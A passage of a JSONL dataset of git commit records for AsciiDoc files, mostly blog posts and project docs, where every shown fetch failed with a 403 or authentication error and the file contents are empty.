2014-09-20-Trying-a-new-theme.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-20-Trying-a-new-theme.adoc","new_file":"_posts\/2014-09-20-Trying-a-new-theme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"584c854fe66be7483bd9861142c3eee52e7caa20","subject":"y2b create post Is My Mac Pro Dead?","message":"y2b create post Is My Mac Pro Dead?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-19-Is-My-Mac-Pro-Dead.adoc","new_file":"_posts\/2015-06-19-Is-My-Mac-Pro-Dead.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65493443980fd77b2a1a5ffd5e479adcf60f7f58","subject":"Update 2017-01-17-New-blog-Portfolio.adoc","message":"Update 2017-01-17-New-blog-Portfolio.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-01-17-New-blog-Portfolio.adoc","new_file":"_posts\/2017-01-17-New-blog-Portfolio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a6de4bd60f9c6d9f92cc64a1dd2dadc86690395","subject":"Update 2019-02-01-vueelement-uislack.adoc","message":"Update 2019-02-01-vueelement-uislack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-vueelement-uislack.adoc","new_file":"_posts\/2019-02-01-vueelement-uislack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d2cc6265ce674dbd32f498d6bfdf2954ae404b6b","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77db30ff7f94ea131da105858c470d6d5c1613ea","subject":"Update 2016-07-08-What-I-would-expect-when-joining-the-new-project.adoc","message":"Update 2016-07-08-What-I-would-expect-when-joining-the-new-project.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-07-08-What-I-would-expect-when-joining-the-new-project.adoc","new_file":"_posts\/2016-07-08-What-I-would-expect-when-joining-the-new-project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f36899270ed8aa8146919dcbee0cfc780393ee5","subject":"Update 2016-10-19-Generating-Docker-artifacts-in-your-Java-project.adoc","message":"Update 2016-10-19-Generating-Docker-artifacts-in-your-Java-project.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2016-10-19-Generating-Docker-artifacts-in-your-Java-project.adoc","new_file":"_posts\/2016-10-19-Generating-Docker-artifacts-in-your-Java-project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c649bf090bd020757fb747c65aee612849b1de4","subject":"Update 2019-05-15-1-About-Bats-and-Artificial-General-Intelligence.adoc","message":"Update 2019-05-15-1-About-Bats-and-Artificial-General-Intelligence.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2019-05-15-1-About-Bats-and-Artificial-General-Intelligence.adoc","new_file":"_posts\/2019-05-15-1-About-Bats-and-Artificial-General-Intelligence.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c4229b41ba848431a97ff0092b4fc18822dc915","subject":"y2b create post Top 5 Best Android Smartphones 2013","message":"y2b create post Top 5 Best Android Smartphones 2013","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-07-Top-5-Best-Android-Smartphones-2013.adoc","new_file":"_posts\/2013-10-07-Top-5-Best-Android-Smartphones-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c3b6fcc61c58de5d539250a2f7e2295344d8bf2","subject":"Update 2016-07-16-Great-internet-speed-at-YVR-Airport.adoc","message":"Update 2016-07-16-Great-internet-speed-at-YVR-Airport.adoc","repos":"willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io","old_file":"_posts\/2016-07-16-Great-internet-speed-at-YVR-Airport.adoc","new_file":"_posts\/2016-07-16-Great-internet-speed-at-YVR-Airport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willyb321\/willyb321.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"116a616f7533632bac64c8b87d41f364935f3d3a","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dfa89326cc782d15436a38232c2f8610b299f46","subject":"Update 2017-09-10-nativescript-and-wordpress-rest-api.adoc","message":"Update 2017-09-10-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-10-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-10-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"483c1d36ac6f410500f7e5589f8c9a72e7a21455","subject":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","message":"Update 2015-12-23-Python-Method-Resolution-Order.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_file":"_posts\/2015-12-23-Python-Method-Resolution-Order.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8b98ef4034c0bd86aeaf38c81457592e424392c","subject":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","message":"Update 2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_file":"_posts\/2018-04-30-Pengalaman-Beli-dan-Rental-Film-di-i-Tunes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7906db83d55eb32cbb5d34d8a9f644cea2c4f024","subject":"Update BulkProcessor size in the example","message":"Update BulkProcessor size in the example\n\nBy default, it is recommended to start bulk with a size of 10-15MB, and increase it gradually to get the right size for the environment. The example shows originally 1GB, which can lead to some users to just copy-paste the code snippet and start with excessively big sizes.\r\n\r\nBackport of #21664 in master branch.","repos":"masaruh\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,spiegela\/elasticsearch,HonzaKral\/elasticsearch,fforbeck\/elasticsearch,JSCooke\/elasticsearch,wenpos\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,geidies\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,HonzaKral\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,fred84\/elasticsearch,sneivandt\/elasticsearch,bawse\/elasticsearch,JSCooke\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,alexshadow007\/elasticsearch,Stacey-Gammon\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,sneivandt\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,winstonewert\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,a2lin\/elasticsearch,MaineC\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,wenpos\/elasticsearch,bawse\/elasticsearch,mikemccand\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,elasticdog\/elasticsearch,nazarewk\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,markwalkom\/elasticsearch,wenpos\/elasticsearch,sneivandt\/elasticsearch,C-Bish\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,Stacey-Gammon\/elasticsearch,obourgain\/elasticsearch,rlugojr\/elasticsearch,JackyMai\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,rlugojr\/elasticsearch,wuranbo\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,maddin2016\/elasticsearch,wuranbo\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,fernandozhu\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,henakamaMSFT\/elasticsearch,vroyer\/elasticassandra,nezirus\/elasticsearch,fred84\/elasticsearch,GlenRSmith\/elasticsearch,Shepard1212\/elasticsearch,kalimatas\/elasticsearch,naveenhooda2000\/elasticsearch,MisterAndersen\/elasticsearch,HonzaKral\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,fernandozhu\/elasticsearch,mortonsykes\/elasticsearch,njlawton\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,ZTE-PaaS\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,njlawton\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,JackyMai\/elasticsearch,JackyMai\/elasticsearch,JSCooke\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,nilabhsagar\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,elasticdog\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,jprante\/elasticsearch,s1monw\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,obourgain\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,StefanGor\/elasticsearch,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,nazarewk\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,gfyoung\/elasticsearch,mikemccand\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,jprante\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,mortonsykes\/elasticsearch,nilabhsagar\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,MaineC\/elasticsearch,bawse\/elasticsearch,JackyMai\/elasticsearch,jimczi\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,kalimatas\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,brandonkearby\/elasticsearch,IanvsPoplicola\/elasticsearch,coding0011\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,ZTE-PaaS\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,uschindler\/elasticsearch,MisterAndersen\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,sneivandt\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,JSCooke\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,elasticdog\/elasticsearch,mohit\/elasticsearch,i-am-Nathan\/elasticsearch,spiegela\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,fforbeck\/elasticsearch,fforbeck\/elasticsearch,nilabhsagar\/elasticsearch,s1monw\/elasticsearch,nknize\/elasticsearch,StefanGor\/elasticsearch,fernandozhu\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,henakamaMSFT\/elasticsearch,ZTE-PaaS\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,winstonewert\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,henakamaMSFT\/elasticsearch,MaineC\/elasticsearch,spiegela\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,masaruh\/elasticsearch,nezirus\/elasticsearch,fforbeck\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,pozhidaevak\/elasticsearch,lks21c\/elasticsearch,geidies\/elasticsearch,artnowo\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,wuranbo\/elasticsearch,artnowo\/elasticsearch,wenpos\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,umeshdangat\/elasticsearch,wangtuo\/elasticsearch,rlugojr\/elasticsearch,brandonkearby\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,brandonkearby\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,vroyer\/elassandra,sneivandt\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,StefanGor\/elasticsearch,geidies\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,kalimatas\/elasticsearch,MisterAndersen\/elasticsearch,rlugojr\/elasticsearch,mohit\/elasticsearch,elasticdog\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,s1monw\/elasticsearch,spiegela\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,strapdata\/elassandra,i-am-Nathan\/elasticsearch,ZTE-PaaS\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,mikemccand\/elasticsearch,elasticdog\/elasticsearch,rlugojr\/elasticsearch,nazarewk\/elasticsearch,obourgain\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,C-Bish\/elasticsearch,henakamaMSFT\/elasticsearch,coding0011\/elasticsearch,mortonsykes\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch","old_file":"docs\/java-api\/docs\/bulk.asciidoc","new_file":"docs\/java-api\/docs\/bulk.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"826a19be6d46229ff0c6df568bdcc96e516ce079","subject":"Add code of conduct.","message":"Add code of conduct.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00fdc1fc727de9279b5bd8eb58a3748d3862ecfd","subject":"Example 004: adoc","message":"Example 004: adoc","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"example\/004_Library\/doc\/004.adoc","new_file":"example\/004_Library\/doc\/004.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a74f1190fc5918bd8b3c68e4704feb5ad9293453","subject":"Update 2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","message":"Update 2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","new_file":"_posts\/2015-12-22-Protecting-a-REST-API-using-Auth0-and-Vertx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cdelmas\/cdelmas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80f9b43668f4ef5ce514f20bc0ccb34384b7902c","subject":"APPNG-2005 add contributing file","message":"APPNG-2005 add contributing file\n","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e7275517e741303c3b90c8d99b722767770436e","subject":"Add CONTRIBUTING.adoc (#2493)","message":"Add CONTRIBUTING.adoc (#2493)\n\n* Created a contribution doc\r\n\r\ntrying...\r\n\r\n* Delete CONTRIBUTIONS.adoc\r\n\r\n* did some changes\r\n\r\n* Update CONTRIBUTION.adoc\r\n\r\ndid the required changes\r\n\r\n* Update CONTRIBUTION.adoc\r\n\r\nRemoved incorrect text, from Robot Framework, and added commands to start and debug RIDE.\r\n\r\n* Update CONTRIBUTION.adoc\r\n\r\nFinal changes to document.\r\n\r\nCo-authored-by: H\u00e9lio Guilherme <b9ad1ef9ecca8d1018e23234ae0cf851388f5100@gmail.com>","repos":"HelioGuilherme66\/RIDE,robotframework\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,HelioGuilherme66\/RIDE,robotframework\/RIDE,HelioGuilherme66\/RIDE,robotframework\/RIDE","old_file":"CONTRIBUTION.adoc","new_file":"CONTRIBUTION.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HelioGuilherme66\/RIDE.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c239c8faf20d2a6ea153eedccfc7c7f9d0f16729","subject":"Update 2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","message":"Update 2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","new_file":"_posts\/2017-03-08-Nuestro-nuevo-proyecto-ya-esta-en-marcha.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b7a629b6ef60cdfd4ba8a8b7830493cd95adacd","subject":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e17c97331d6b822eb90f4ddd59d1485dd6385923","subject":"Update 2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","message":"Update 2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","repos":"hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io,hhimanshu\/hhimanshu.github.io","old_file":"_posts\/2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","new_file":"_posts\/2015-07-10-Partially-Applied-Functions-vs-Currying.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hhimanshu\/hhimanshu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a1421cd006130465b84010e3ddaf3016ce0dba6","subject":"Update 2016-11-06-Sunday.adoc","message":"Update 2016-11-06-Sunday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-06-Sunday.adoc","new_file":"_posts\/2016-11-06-Sunday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"381c266caf7244dcc1c7bbde332aba7b0d39a9a1","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16bd55ab5b788e91d9e93d0773428544244b5b84","subject":"Include technical documentation on status quo","message":"Include technical documentation on status quo\n","repos":"KestrelComputer\/kestrel,KestrelComputer\/kestrel,sam-falvo\/kestrel,KestrelComputer\/kestrel,sam-falvo\/kestrel,8l\/kestrel,8l\/kestrel,8l\/kestrel,8l\/kestrel,sam-falvo\/kestrel,8l\/kestrel,sam-falvo\/kestrel,KestrelComputer\/kestrel,8l\/kestrel","old_file":"cores\/Kestrel-2\/sw\/sts\/doc\/technical-reference-manual.asciidoc","new_file":"cores\/Kestrel-2\/sw\/sts\/doc\/technical-reference-manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sam-falvo\/kestrel.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"e13b0ccca4e6162546b861383b5e87721f6bfdd9","subject":"Added news\/2015-12-24-forge-3.0.0.beta1.asciidoc","message":"Added news\/2015-12-24-forge-3.0.0.beta1.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2015-12-24-forge-3.0.0.beta1.asciidoc","new_file":"news\/2015-12-24-forge-3.0.0.beta1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ba9f1cd4b3121fb5300687ca349477db7e0e6a7f","subject":"Update 2015-10-11-MapReduce-Tutorial.adoc","message":"Update 2015-10-11-MapReduce-Tutorial.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_file":"_posts\/2015-10-11-MapReduce-Tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd101454722537664762199fafb60da03fb1d99","subject":"Update 2016-09-04-JSO-Ntatham-Part-1.adoc","message":"Update 2016-09-04-JSO-Ntatham-Part-1.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-09-04-JSO-Ntatham-Part-1.adoc","new_file":"_posts\/2016-09-04-JSO-Ntatham-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 